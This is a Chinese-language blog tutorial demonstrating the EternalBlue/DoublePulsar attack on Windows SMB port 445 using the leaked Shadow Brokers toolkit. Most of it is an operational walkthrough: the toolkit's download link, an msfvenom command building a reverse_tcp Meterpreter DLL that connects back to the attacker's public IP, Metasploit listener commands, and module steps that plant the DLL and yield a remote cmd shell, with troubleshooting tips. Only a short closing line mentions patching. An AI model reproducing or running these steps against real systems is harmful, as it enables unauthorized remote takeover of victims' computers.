1概述
默认共享可以干什么呢?除了通过默认共享来查看别人电脑资料,还有更厉害的直接提权。近年来罕见的高危漏洞来了,如果不安装最新微软2017年3月份的补丁的话,攻击者可以通过远程入侵445端口来获取对方的系统权限。
工具用的是Shadow Brokers组织公布的神器,而且肯定是已经被默默使用了很久了,简单的说就是如果Windows的默认共享445端口是对外可以被访问的,那么别人就可以远程登录你的系统了。
2攻击演示
测试机器:
攻击方:win200332位
目标:win7 64位
1https://github.com/misterch0c/shadowbroker
入口文件是fb.py,需要python环境。
注意这里原先是在win7 64位上面准备攻击,但是程序有报错需要在32位上面运行。
2.1准备工作
安装python环境,缺少对应库的话就再自行安装。
测试目的端口是否通:
确定可以尝试攻击。
2.1.1 msf平台
然后先用msf平台生成一个dll木马,后面让对方加载这个dll木马之后就可以控制对方了。
2msfvenom -pwindows/x64/meterpreter/reverse_tcp LHOST=公网IP LPORT=4444 -f dll > go.dll
保存好生成的go.dll备用,到时候需要通过smb漏洞上传到目标机器。
准备好接收shell的4444端口,注意IPTABLES需要提前开放此端口:
3use exploit/multi/handler
4set LHOST公网IP
5set LPORT 4444
6set PAYLOADwindows/x64/meterpreter/reverse_tcp
7exploit
通过msfconsole命令进入shell的监听界面
注意,这里有个大坑,msfvenom生成的dll和set PAYLOAD的要对应,之前有个没有加x64,有个又有,然后一直反弹shell不成功。
监听好shell的反弹端口4444之后来进行具体入侵操作。
2.2方程式工具
下载地址
8https://github.com/misterch0c/shadowbroker
修改fb.py,不然运行起来会报错,修改后的diff如下:
就是在原先的fb.py里面注释几行额外的目录加载。
然后正式进行攻击测试,下面很多步骤可以默认选回车即可。
分别填写目的IP和本机的IP,然后可以默认回车:
2.2.1 Eternalblue模块
然后可以开始利用模块了:
9use Eternalblue
然后会有目标信息确认:
最后执行:
成功的话会有success显示:
2.2.2Doublepulsar模块
然后是目标机器加载我们的dll木马。
这里有些选项,比较容易辨别:
最后Execute Plugin,回车:
然后可以可以看到之前的监听shell有响应:
成功建立连接,再敲shell就成功进入对方机器的cmd终端了。
注意,实际操作中对方机器有一定机率会有报错提示,然后会自动重启。
3漏洞修复
漏洞修复比较简单,直接安装最新补丁即可,具体的就是这个补丁:
领取专属 10元无门槛券
私享最新 技术干货